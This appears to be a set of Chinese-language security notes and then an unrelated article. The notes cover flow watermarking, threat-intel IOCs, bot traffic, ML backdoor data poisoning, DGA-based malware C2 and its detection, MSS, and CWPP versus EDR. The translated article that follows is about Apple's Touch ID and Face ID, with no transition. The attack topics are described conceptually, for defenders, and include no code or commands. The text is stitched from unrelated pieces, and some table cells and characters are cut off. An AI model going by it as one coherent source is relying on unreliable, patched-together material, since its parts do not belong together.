當網絡數據流經過水印嵌入點 (如路由器 )時 ,嵌入器使用密鑰 (Key)將水印進行 編碼 ,通過調制流量特征 (改變數據流的速度 )嵌入該水印 。嵌入水印后的標記數據流在網絡傳輸時會遭受一些干擾和變形 ,如中間路由器 (或匿名網絡 、 跳板等)的延遲 、丟包或重傳數據包 、包重組和時間擾亂等 。 最終 ,當被擾亂之后的標記數據流到達 印檢測點 ,檢測器使用與嵌入器同樣的密鑰 (非盲檢測時 ,檢測器還需要標記數據流嵌入水印前的相關信息)提取標記數據流中的水印信息,如果與編碼時的水印一致 ,那么就認為這兩條數據 流之間存在關聯 。
一些威脅情報,海量的黑IP和黑域名,一般來說都是10G起步
Reference:https://zhuanlan.zhihu.com/p/403046479
失陷檢測情報,即攻擊者控制被害主機所使用的遠程命令與控制服務器情報。情報的IOC往往是域名,IP,URL形式,有時也包括SSL證書,HASH等形式,這種IOC可以推送到不同的安全設備中,如NGFW,IPS,SIEM等,進行檢測發現甚至實時阻斷,這類情報基本上都會提供危害等級,攻擊團伙,惡意家族等更加豐富的上下文信息,來幫助確定事件優先級并指導后續安全響應活動。使用這類情報是及時發現已經滲透的到組織的APT團伙,木馬蠕蟲的最簡單,及時,有效的方式。
Reference:https://www.freebuf.com/articles/network/382439.html
在互聯網行業,Bot 一般指的是在 Web、APP 應用、API 接口上通過運行自動化程序執行重復任務的虛擬機器人,它們有的動作比人類快很多,有的行為則很隱蔽不易被發現,這些機器人所產生的活動日志被稱為 Bot 流量(機器人流量)。
類別 | 描述 | 舉例 |
網絡爬蟲 | 用于瀏覽互聯網并收集信息的自動化程序 | 下載機器人、圖片爬蟲、文字爬蟲 |
惡意軟件Bot | 用于執行惡意活動,如傳播病毒、竊取敏感信息等的自動化程序 | 外掛 |
社交媒體Bot | 在社交媒體平臺上執行自動化任務的程序,有時用于誤導用戶或傳播虛假信息 | 僵 |
聊天機器人 | 用于與人類進行自動化對話的程序,常見于客戶支持、在線聊天等場景 | 客服機器人 |
網絡釣魚Bot | 用于進行網絡釣魚活動,試圖欺騙用戶提供敏感信息的自動化程序 | - |
游戲Bot | 在在線游戲中使用,自動執行特定游戲任務的程序,有時被用于非法活動或作弊 |
技術架構:
特征工程-》規則管理-》策略下發
https://blog.csdn.net/qq_42395917/article/details/126282145
后門攻擊:通過改變模型對一些特定輸入的輸出而達到目的,在圖像分類的領域中,后門攻擊的trigger(觸發器)是圖像當中的一些像素點,當這些像素點經過模型被計算成某些值之后,模型可能就會產生我們想要的結果,這就達到了我們的目的。
后門攻擊是將毒化后的數據集打上對應的標簽然后放到模型中進行訓練,隨后得到一個被植入后門的模型,然后我們將毒化的數據集放入模型時就會輸出我們想要的結果。
Reference:https://cloud.tencent.com/developer/article/1552318
惡意軟件利用DGA算法與C2服務器進行通信的原理如圖所示,客戶端通過DGA算法生成大量備選域名,并且進行查詢,攻擊者與惡意軟件運行同一套DGA算法,生成相同的備選域名列表,當需要發動攻擊的時候,選擇其中少量進行注冊,便可以建立通信,并且可以對注冊的域名應用速變IP技術,快速變換IP,從而域名和IP都可以進行快速變化。
很顯然,在這種方式下,傳統基于黑名單的防護手段無法起作用,一方面,黑名單的更新速度遠遠趕不上DGA域名的生成速度,另一方面,防御者必須阻斷所有的DGA域名才能阻斷C2通信,因此,DGA域名的使用使得攻擊容易,防守困難。
DGA算法由兩部分構成,種子(算法輸入)和算法,可以根據種子和算法對DGA域名進行分類,DGA域名可以表示為AGD(Algorithmically-Generated Domains)。
按照種子進行分類
種子是攻擊者和客戶端惡意軟件共享的一個DGA算法的輸入參數之一,不同的種子得出的DGA域名是不一樣的。一般來說,種子可按如下方式進行分類:
1.基于時間的種子(Time dependence)。DGA算法將會使用時間信息作為輸入,如:感染主機的系統時間,http響應的時間等。
2.是否具有確定性(Determinism)。主流的DGA算法的輸入是確定的,因此AGD可以被提前計算,但是也有一些DGA算法的輸入是不確定的,如:Bedep[4]以歐洲中央銀行每天發布的外匯參考匯率作為種子,Torpig[5]用twitter的關鍵詞作為種子,只有在確定時間窗口內注冊域名才能生效。
根據種子的分類方法,DGA域名可以分為以下4類:
1.TID(time-independent and deterministic),與時間不相關,可確定;
2.TDD(time-dependent and deterministic),與時間相關,可確定;
3.TDN(time-dependent and non-deterministic),與時間相關,不可確定;
4.TIN(time-independent and non-deterministic),與時間不相關,不可確定;
按照生成算法進行分類
現有DGA生成算法一般可以分為如下4類:
1.基于算術。該類型算法會生成一組可用ASCII編碼表示的值,從而構成DGA域名,流行度最高。
2.基于哈希。用哈希值的16進制表示產生DGA域名,被使用的哈希算法常有:MD5,SHA256。
3.基于詞典。該方式會從專有詞典中挑選單詞進行組合,減少域名字符上的隨機性,迷惑性更強,字典內嵌在惡意程序中或者從公有服務中提取。
4.基于排列組合。對一個初始域名進行字符上的排列組合。
檢測手段:
域名情報+數據訓練(收集DGA域名,其中包含約4570萬個DGA域名,包含62個DGA家族,另外收集收集了大量良性NXDomain,包含1530萬個域名,以這些數據為原始輸入,進行有監督學習。)
Reference:https://www.zhihu.com/question/495882650/answer/2200401122
MSS:
Managed Security Service,安全托管服務。通常指為客戶提供安全運營管理服務的供應商。安全托管服務在云計算領域,指企業由于降本增效或專注業務發展等需要,將部分繁重、重復安全運營工作托付給專業云服務商,有專業安全運營團隊開展的持續分析及運營服務。
企業轉向托管安全服務提供商可以減輕他們每天面臨的與信息安全有關的壓力,借助安全托管服務商在某些安全領域的優勢,可以補齊企業在安全建設或運營管理中的短板,提升安全管理效率。
MSSP:Managed Security Service Provider,安全托管服務商。通常指為客戶提供安全運營管理服務的供應商。
MSS服務一般包括哪些內容?
Reference:https://zhuanlan.zhihu.com/p/590228643
客戶使用云提供商的主機進行業務上云,那么CWPP就是為了云上主機的防護,包括虛擬機防護和網絡安全防護
云上防護最好的方式就是基于云服務提供商提供的接口來進行安全開發處理,但是實際上云服務提供商眾多,接口也各不相同,所具備的安全能力也不盡相同,沒有統一的標準去做這些安全。基于這一現狀,出現了以agent形式的CWPP安全方案。
加固、配置與漏洞管理(Hardening, Configuration and Vulnerability Management):加固是針對系統、鏡像等的加固,通過關閉非必要功能、端口和服務,及時進行系統補丁更新維護。
配置即為服務器的配置優化,是針對操作系統層和應用層進行配置,保障系統以及應用的安全合理性,以提升安全能力以及防攻擊的功能,避免因為錯配和漏配導致產生安全問題。漏洞管理是針對操作系統漏洞和應用程序漏洞的管理,在網絡安全事件中,基于漏洞的攻擊數量一直居高不下,而最常見的最嚴重的漏洞就是系統漏洞和WEB應用漏洞。
因為WEB應用一般對外提供,所以必須暴露于互聯網之中,因此安全要求極為重要。基于上述的能力要求,CWPP需要支持針對系統的加固,以及配置的基線檢查和漏洞防護的功能。漏洞管理,分為操作系統漏洞管理和應用漏洞管理。目前網絡攻擊主要是通過web服務器或者web應用漏洞發起,因此CWPP產品要能提供標準化、同時支持制定自定義的web應用漏洞防護策略。
基于身份的網絡微隔離和可視化(Network Firewalling, Visibility and Microsegmentation):在這一能力要求中,包括了兩個部分內容,分別是微隔離和可視化。想要實現微隔離和可視化的前提,就是要先識別資產,只有在資產被識別后才可以針對資產進行管理,這里所說的資產可以是主機、虛擬機、容器等工作負載,所以圖形化管理用戶的主機業務資產是CWPP的必要條件。微隔離,就是在資產識別基礎之上手動或者自動的進行流量的隔離,這里的隔離主要是東西向流量的隔離,微隔離的基本實現方式是通過agent控制本地的安全程序,如管理windows和linux系統內置的防火墻,來進行流量分割管理。并且這里的流量分割管理是可以跨物理、虛擬架構、網絡基于角色的訪問策略。可視化要求能夠提供可視化和監控通信流量,即能知道工作負載間的通信情況。
CWPP與EDR(Endpoint Detection & Response,終端檢測和響應)兩個安全產品,在功能上有很多重疊的部分,比如兩款產品均具備資產識別、漏洞與補丁管理和基線檢查的功能。
差異點 | EDR | CWPP |
防護對象 | 終端 | 主機(服務器、容器、serverless) |
產品架構 | EDR一般使用輕代理方式,本地放置引擎和規則庫等,本地客戶端具備管理界面,可以獨立使用。 | CWPP是輕端重云架構,管理都放在云端,本地無規則庫和分析引擎,本地客戶端沒有管理界面,主打輕量化業務無侵害。 |
部署場景 | 部署與企業辦公網絡中,針對日常辦公終端使用,部分情況可以用于數據中心。 | 主要定位在數據中心維度,強調混合數據中心下的統一部署和管理。 |
產品關注點 | 關注重點在于病毒防護,針對事中階段進行攔截處置,強調的是安全問題閉環處置。 | 更關注基礎運維相關的內容如:資產管理、進程監控、變更管理、日志管理、權限管理、基線管理、系統完整性監控、應用程序控制,行為監控等,更聚焦在日常性的基礎運維工作。 |
使用階段 | 主要用于安全事件的事中階段處理和事后階段閉環。 | 主要用于安全事件的事前階段,強調加固的重要性,做事前防護。 |
引入Touch ID四年之后,iOS用戶的隱私和安全性得到了極大的提升,今天的蘋果公司正在延續著史蒂夫?喬布斯(Steve Jobs)的夢想——不斷創新:在iPhone X中引入了臉部識別技術。
在蘋果Town Hall劇場,墻上掛著一句喬布斯報的名言:“你如果出色地完成了某件事,那你應該再做一些其他的精彩事兒。不要在前一件事上徘徊太久,想想接下來該做什么。”
9月13日,蘋果公司在蘋果公園(Apple Park)剛剛完式的史蒂夫?喬布斯劇院(Steve Jobs Theatre)舉行了iPhone X發布會。這是一個規模更大、更環保、更舒適、在建筑上令人眼花繚亂的場所,劇院配備了壯觀的4K投影系統,以及應用了更多先進技術、更好保障和美學方面的進步。
自2007年喬布斯親自推出iPhone,iPhone就成了蘋果公司的搖錢樹,現在又開始了重新設計。
傳統iPhone(一個帶有圓形Home按鍵的矩形)的極具代表性的標志,現在已經讓位給了一個新版本,這就是iPhone X的外觀,極窄的邊框和頂部的一個切口。更重要的是,物理Home鍵的作用已經沒有了,而不是在采用虛擬鍵的方案,它已被完全拋棄。
以前Home鍵的作用,從返回主屏幕到切換應用程序、調用Apple Pay、屏幕截圖以及通過Touch ID解鎖設備,這些功能都被重新定義。
iPhone X代表了自iOS誕生以來蘋果對整個平臺計算的最大膽的反思。然而,在iPhone X過渡過程中,最讓人擔心、不確定和懷疑的是放棄了Touch ID,這在iPhone的前五代中還沒有出現。
與iPhone X的新FaceID類似,Touch ID首次出現在iPhone 5s上,同期發布的新配色iPhone(較為便宜的iPhone 5c則沒有)。當時人們普遍預期,較低價位的5c將推動iPhone的銷售,當時業界傾向于低價的智能手機。
但恰恰相反,蘋果的內部預測被iPhone 5s的創紀錄的大幅增長的銷量顛覆,顯然,Touch ID的驅動了iPhone 5s的銷量增長。
值得注意的是,當時5s面臨著對手更激烈競爭,市場上的產品功能更為強大,更大的5.7英寸屏幕、更高分辨率的1080p顯示屏、更快的4G LTE數據服務、立體聲揚聲器、光學防抖、防水和充電,但此前,Android手機上的指紋識別已經失敗了。
2013年,與iPhone 5s一同上市的,還有科技媒體廣為贊譽的各種手機上市,包括HTC One、Google的Nexus 5、Moto X、諾基亞的LUMIA 1020 Windows Phone、三星Galaxy S4和索尼的Xperia Z1。盡管iPhone 5s沒有花哨功能,但iPhone 5s擊敗了所有的競爭對手。
iPhone 5s幫助蘋果構建了新一代的iOS 7以及iOS App Store生態系統的所有優勢,這些功能和優勢也惠及到了iPhone 5c,5c也擊敗了Windows和Android的旗艦產品。然而,Touch ID(和支持它的A7芯片)是iPhone 5s的主要銷售驅動因素,它遠比廉價的5c銷量要高得多。
在2013年iPhone 5s出現之前,如果您想保護手機,那么你需要使用密碼鎖定。事實上,因為輸入密碼不方便,只有不到一半的用戶實際上使用密碼。
在2014年WWDC上,蘋果宣布其新的Touch ID從根本上提高了iPhone用戶的密碼安全性,并將使用率從49%上升到83%。
而令人難以置信的是,就在幾年前,大多數人根本就不用使用密碼(盡管大部分人的手機有密碼,但很可能密碼的設置很簡單)。沒有密碼,任何人拿到你的手機都可以瀏覽你的照片,打開電子郵件,并通過短信或電子郵件重設各種密碼,實質上接管了你的數字生活。
Touch ID被應用得如此之快,是因為蘋果公司以這樣的方式讓用戶毫不費力地使用了這項技術。當三星,HTC等人后來試圖復制蘋果的功能時,他們采用的方案有明顯的安全問題。比如將用戶未加密的指紋照片保存到文件系統,全局可讀(不設置任何文件權限),這樣很容易讓任何進程都可以輕松地讀取和提取數據。
三星Galaxy S5聲稱一個指紋傳感器就像iPhone一樣,但是很慢,而且指紋數據并不安全
蘋果并不只是引入了指紋讀取器;它開發并公開了其全面的隱私政策和安全架構,確保手機上的任何應用程序都不能訪問任何生物特征數據。這需要一個特別安全的構建在A7芯片中的Secure Enclave環境,iOS和其它應用程序無法讀取,一旦配置,操作系統只能驗證注冊的用戶是否存在,而不是收集或存儲生物特征數據。
蘋果投入了大量資源來研究Touch ID,因為它比用簡單的指紋識別iPhone更有意義。該公司還打算使用Touch ID支撐Apple Pay,并允許第三方應用可以使用但不是濫用的身份驗證系統。
在剛推出Touch ID的時候,人們普遍不相信,而且更惡心的煽動性攻擊蘋果保護用戶的能力。一位名叫Geppy Parziale指紋專家聲稱Touch ID在發布之前無法正常工作,他堅持認為傳感器無法長期重復使用,一旦失敗,任何人都可以進入設備。
Touch ID發布后,美國參議員Al Franken立即致電蘋果,詢問一系列問題,包括Apple是否收集、存儲、傳輸、備份或以其他方式共享用戶的指紋數據,以使惡意用戶能夠冒用身份,因為一旦被盜,他們無法改變指紋。
黑客聲稱他們在實驗室對一個人的指紋進行高分辨率掃描,并用激光打印機來偽造指紋模型來繞過系統。盡管Touch ID在其自動關閉之前提供了狹窄的48小時和五次身份驗證嘗試。
Touch ID的瘋狂持續了好幾個月,最后在Touch ID變得無可爭議的情況下才消失,Touch ID正在大大增加現實世界的安全性,甚至有助于顯著減少手機盜竊發生,這要歸功于蘋果的iOS 7激活鎖功能與增加使用密碼安全性相關聯。
還有人擔心如果傷害你的手指會發生什么?竊賊在竊取你的手機的時候會不會切掉你的手指?或者你是罕見的沒有指紋出的人怎么辦?
當競爭對手推出自己的指紋系統時,即使是像HTC和三星那樣的巨大的安全漏洞,也沒有出現什么瘋狂的憤怒。萬事達卡最近推出了指紋信用卡,沒有蘋果的強大的安全策略,媒體也沒有人關心。
“Touch ID瘋狂”是一個人為制造的謊言,目的是推銷聳人聽聞的恐慌,一些同樣的消息不斷宣傳,推進和煽動了從天線門到AntennaGate、BendGate。一旦他們意識到對蘋果的業務沒有任何影響,就會明顯失去對這個故事的興趣。
過去四年的Touch ID,蘋果公司提升它速度,將其功能擴展到Apple Pay,然后將其轉換為沒有位移的固態傳感器,以便于在iPhone 7上實現防水功能。今年,蘋果開發替代性技術人臉識別,并在用iPhone X采用了Face ID。
當不再用Home鍵上光學掃描指紋,iPhone X的TrueDepth傳感器是一個3D結構傳感器,通過不可見光譜中的光來對用戶臉部的輪廓進行成像。然后,該數據由新開發的A11仿生芯片中的神經引擎進行處理,以認證用戶,而不考慮面部毛發,眼鏡,帽子或其他細節。
在它的實際演示區,蘋果公司展示了iPhone X在用戶查看設備時,快速人臉識別的表現。認證過程迅速,解鎖設備以顯示最近的通知,并允許用戶向上滑動以選擇使用應用程序。通過點擊側面按鈕觸發的Apple Pay,執行類似的快速人臉識別。
與指紋識別相比,人臉識別有多種優勢:蘋果聲稱的人臉識別達到了百萬分之一的誤差率,而指紋識別的誤差是5萬分之一。用戶使用手機時還必須看一下該設備,這使得偷偷解鎖手機的人比Touch ID更難。
與Touch ID一樣,iOS 11可以輕松禁用生物識別身份驗證,當你需要禁用時,按順序點擊側面按鈕五次就可以。因此,在不希望Face ID工作的情況下,你可以輕松的強制iPhone X要求輸入你的密碼。它也會在允許兩次錯誤密碼之后自動關閉。
蘋果公司多年來一直致力于iOS的底層安全模型和結構傳感器,早在2013年就從PrimeSense其獲得的結構傳感器3D掃描技術,當時Touch ID還是最先進的。
在蘋果公司收購Touch ID之前,就像其他供應商都和AuthenTech公司在指紋識別上合作過,Google、Microsoft、Qualcomm等公司以前也與PrimeSense在 3D結構傳感器技術方面有過合作,但沒有哪家公司設法降低成本,像蘋果公司一樣,將其功能擴展到實際應用中。
蘋果開發應用于iPhone X的Face ID的TrueDepth系統的3D技術組合包括去年初收購的Metaio和運動捕捉公司Faceshift的AR團隊,和2015年收購Emotient的面部表情識別團隊。
蘋果公司還搶購了一系列人工智能和機器學習公司,從而形成了一個超強的專業團隊,不僅提供面部識別,還提供了新的iOS ARKit和Vision框架和應用程序,從Animoji到構建3D的平臺,在Apple活動中為Snapchat演示了AR過濾器。
可以預見,批評家已經開始行動,向公司暗示,Face ID 不可能真實工作。
Franken參議員再次給蘋果公司寫信,詢問蘋果是否收集和銷售與用戶面孔相關的數據,以及是否考慮了其機器學習模型中識別不同的面部特征。
Luke Graham發表在CNBC的一篇報道中稱,“蘋果Face ID安全技術可能不會受到消費者歡迎”,根據這一調查,40%的受訪者認同生物識別技術“風險太大和未來”的觀點。然而,30%的受訪者從來沒有聽說過使用生物識別來驗證身份,另外55%的受訪者表示他們聽說過生物識別技術,但他們從未使用生物識別技術。
該調查討論了與購物相關的生物識別技術,而不是蘋果公司的Face ID(被作為誘導點擊)。然而,Touch ID也是生物認證身份驗證,而PaySafe對英國,美國和加拿大消費者的調查實際上不太可能找到一組3000多人,其中一半在過去四年中一直沒有使用Touch ID。
Ron Amadeo 為Ars Technica 撰寫了一篇文章,宣稱Face ID“會很糟糕”,盡管在第十一段他也承認:“我會承認我還沒有嘗試過Face ID”,在解釋之前,“很難想像一個面部識別系統,解決問題的方法是讓手機對準你的臉”。
雖然有很多人擔心,在看到屏幕前必須瞥一下你的iPhone來解鎖有多么可怕,但實際的情況是Face ID不僅僅能替代Touch ID的所有功能,還可以處理諸如在閱讀時保持一直保持手機亮屏。
當然,擺脫Home按鍵的最大好處就是可以縮小邊框,在更緊湊的手機中提供更大的屏幕。
此前,我們注意到,蘋果的高價位iPhone X使公司能夠相對小眾用戶群體推出最先進的新技術。
然而,根據Creative Strategies的分析師Ben Bajarin調查,蘋果公司的供應商在今年年底之前提供4000萬到5000萬臺iPhone X的庫存。這意味著假日季度iPhone的銷售額將有一半是iPhone X,也意味著iPhone X銷量在兩個月內將達到一個非常堅實的基礎。
如此大量的Face ID用戶意味著第三方開發人員將有充分的理由開發其TrueDepth傳感器,利用其硬件創造出新的應用方式。當然,Face ID會自動在應用中替換使用Touch ID進行身份驗證的功能。
看起來,Face ID就是那個下一步。
(根據appleinsider網站的信息編譯整理)